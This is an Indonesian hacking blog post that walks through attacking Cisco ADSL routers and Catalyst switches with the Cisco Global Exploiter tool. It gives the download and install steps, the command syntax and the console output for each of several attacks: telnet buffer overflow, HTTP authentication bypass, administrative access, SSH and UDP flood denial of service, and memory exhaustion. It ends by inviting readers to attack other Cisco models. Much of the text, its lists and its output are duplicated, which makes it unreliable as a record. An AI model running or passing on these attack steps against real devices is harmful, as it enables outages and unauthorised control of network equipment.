CISCO 675, 677 n 678 DSL ATTACKING
Kali ini saya ingin berbagi tentang attacking terhadap jaringan berbasis CISCO. CISCO sendiri merupakan perangkat jaringan yang tidak asing lagi... bukan hanya karena mahal... tapi juga dengan beberapa kehandalannnya dalam menerapkan routing. Apakah mahal berarti aman...???? jawabnya tanya saja sama Dew* *ersik*.. kekkekkekekke..upppsss... aman atau tidaknya bukan ditangan Dew* *ersik* tapi ditangan para ahlinya..... iya ga...??? tapi tentu tidak hanya itu saja... hasil akhir dari ciptaan vendor harus juga berkualitas....
Banyak sekali tindakan attacking yang bisa kita lakukan terhadap jaringan berbasis CISCO, diantarnya : Telnet Buffer Overflow, Denial of Services a.k.a DoS, Bypass HTTP Authetication, HTTP Configuration Arbitraty Administrative, SSH DoS, UDP Flooding, Web Administration DoS, EiGRP gerator, EiGRP Sniffing, Password Attacking, Catalyst Memory Leak dan masih banyak hal lain yang bisa dilakukan penyerangan.
Bagaimana melakukan attacking terhadap CISCO, salah satunya adalah memanfaatkan aplikasi bernama : CGE... ya, Cisco Global Exploiter yang merupakan tools serba bisa dan biasa digunakan untuk melakukan penyerangan terhadap jaringan berbasis CISCO.
CGE akan melakukan penyerangan terhadap 14 Vulnerability yang terdapat pada CISCO, diataranya : Cisco 677/678 Telnet Buffer Overflow Vulnerability, Cisco IOS Router Denial of Service Vulnerability, Cisco IOS HTTP Auth Vulnerability, Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability, Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability, Cisco 675 Web Administration Denial of Service Vulnerability, Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability,Cisco IOS Software HTTP Request Denial of Service Vulnerability, Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability,Cisco Catalyst Memory Leak Vulnerability, Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability, 0 Encoding IDS Bypass Vulnerability (UTF),Cisco IOS HTTP Denial of Service Vulnerability.
CGE akan melakukan penyerangan terhadap 14 Vulnerability yang terdapat pada CISCO, diataranya : Cisco 677/678 Telnet Buffer Overflow Vulnerability, Cisco IOS Router Denial of Service Vulnerability, Cisco IOS HTTP Auth Vulnerability, Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability, Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability, Cisco 675 Web Administration Denial of Service Vulnerability, Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability,Cisco IOS Software HTTP Request Denial of Service Vulnerability, Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability,Cisco Catalyst Memory Leak Vulnerability, Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability, 0 Encoding IDS Bypass Vulnerability (UTF),Cisco IOS HTTP Denial of Service Vulnerability.
tuh ada 14 biji.... (hhiikksss, biji siapa yah yang jumlahnya 14...??? **just kidding **), itu artinya mahal bukan berarti tidak memiliki kelemahan, iya ga...?? mari kita lakukan explotasi terhadap kelemahan tersebut, gini loh caranya :
Tested :
. tested in ubuntu 9.10 Karmic Koala
. tested in target : CISCO 678 ADSL CPE, CISCO Catalyst 2950, CISCO Router 1760
Eksekusi :
lanjutkan ke target yang sudah ditemukan, dengan langkah :
4. Jika kita ingin melakukan IOS HTTP Configuration Arbitrary Administrative Access:
6. Jika kita ingin melakukan Web Administration Denial of Service :
7. Jika kita ingin melakukan Remote Arbitrary pada Catalyst 3500 XL :
8. Jika kita ingin melakukan UDP Flood Denial of Service :
9. Jika kita ingin melakukan "Memory Leak" terhadap CISCO Catalyst :
Nah, lirva32 cuma bisa kasih sample seperti itu... silahkan dilanjut untuk penyerangan terhadap series CISCO lainnya.. nanti kita berbagi lagi di ezine tercinta.
Pada akhirnya, lirva32 berpesan bahwa "tidak ada system yang 100% secure sekalipun dibangun dengan perangkat mahal". Semoga saja tulisan ini bisa menambah khazanah ilmu kalian semua... semoga bermanfaat.
. Download CGE13 disini : http://packetstormsecurity.org/0405-exploits/cge-3.tar.gz
. Requirements: Perl
. Installation Linux : tar -zxvf cge-13.tar.gz
. Requirements: Perl
. Installation Linux : tar -zxvf cge-13.tar.gz
Tested :
. tested in ubuntu 9.10 Karmic Koala
. tested in target : CISCO 678 ADSL CPE, CISCO Catalyst 2950, CISCO Router 1760
Eksekusi :
. Lakukan proses scanning untuk mendapatkan IP target.
lanjutkan ke target yang sudah ditemukan, dengan langkah :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl
Usage :
perl cge.pl <target> <vulnerability number>
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
Example :
1. Jika kita ingin melakukan Telnet Buffer OverFlow terhadap Cisco 677 dan 678 ADSL CPE :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 1
��_��_��_
*******************
Welcome to Vulcan
*******************
��_��_��_
*******************
Welcome to Vulcan
*******************
Conexant Inc., Software Release 2.5.060823m
Copyright (c) 2001-2003 by Conexant, Inc.
Copyright (c) 2001-2003 by Conexant, Inc.
login: ?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX
2. Jika kita ingin melakukan DoS terhadap IOS Router :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 2
Packet sent ...
Now checking server's status ...
Vulnerability unsuccessful exploited. Target server is still up ...
Packet sent ...
Now checking server's status ...
Vulnerability unsuccessful exploited. Target server is still up ...
3. Jika kita ingin melakukan ekploitasi terhadap HTTP Auth :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.1.254 3
Vulnerability successful exploited with [http://192.168.1.254/level/17/exec/....] ...
4. Jika kita ingin melakukan IOS HTTP Configuration Arbitrary Administrative Access:
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 4
Vulnerability successful exploited ...
Vulnerability successful exploited ...
5. Jika kita ingin melakukan DoS terhadap Catalyst SSH Protocol :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 5
Packet sent ...
Packet sent ...
6. Jika kita ingin melakukan Web Administration Denial of Service :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 6
Packet sent ...
Packet sent ...
Server response :
-
-
-
-
-
-
7. Jika kita ingin melakukan Remote Arbitrary pada Catalyst 3500 XL :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 7
Enter a file to read [ /show/config/cr set as default ] :
Packet sent ...
Enter a file to read [ /show/config/cr set as default ] :
Packet sent ...
Server response :
HTTP/1.0 404 Not Found
Server:
Content-Type: text/html
Date: Sat, 01 Jan 2005 17:09:54 GMT
Last-Modified: Sat, 01 Jan 2005 17:09:54 GMT
Accept-Ranges: bytes
Connection: close
Server:
Content-Type: text/html
Date: Sat, 01 Jan 2005 17:09:54 GMT
Last-Modified: Sat, 01 Jan 2005 17:09:54 GMT
Accept-Ranges: bytes
Connection: close
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>404 Not Found</H2>
The requested URL '/exec/show/config/cr' was not found on this server.
<HR>
<ADDRESS><A href=""></A></ADDRESS>
</BODY>
</HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>404 Not Found</H2>
The requested URL '/exec/show/config/cr' was not found on this server.
<HR>
<ADDRESS><A href=""></A></ADDRESS>
</BODY>
</HTML>
** sorry, uji coba gagal... krn target CISCO 678 ADSL CPE.. Vulnerability ini hanya berlalu pada CISCO Catalyst 3500 XL **
8. Jika kita ingin melakukan UDP Flood Denial of Service :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 9
Input packets size : 500
Input packets size : 500
Packets sent ...
Please enter a server's open port : 23 ** use can using port 53 **
Please enter a server's open port : 23 ** use can using port 53 **
Now checking server status ...
Vulnerability unsuccessful exploited. Target server is still up ...
Vulnerability unsuccessful exploited. Target server is still up ...
9. Jika kita ingin melakukan "Memory Leak" terhadap CISCO Catalyst :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 11
Input the number of repetitions : 1000
Input the number of repetitions : 1000
** waiting until your CISCO Memory Leak.. bye..bye..catalyst... **
Nah, lirva32 cuma bisa kasih sample seperti itu... silahkan dilanjut untuk penyerangan terhadap series CISCO lainnya.. nanti kita berbagi lagi di ezine tercinta.
Pada akhirnya, lirva32 berpesan bahwa "tidak ada system yang 100% secure sekalipun dibangun dengan perangkat mahal". Semoga saja tulisan ini bisa menambah khazanah ilmu kalian semua... semoga bermanfaat.
Sumber : lirva32.org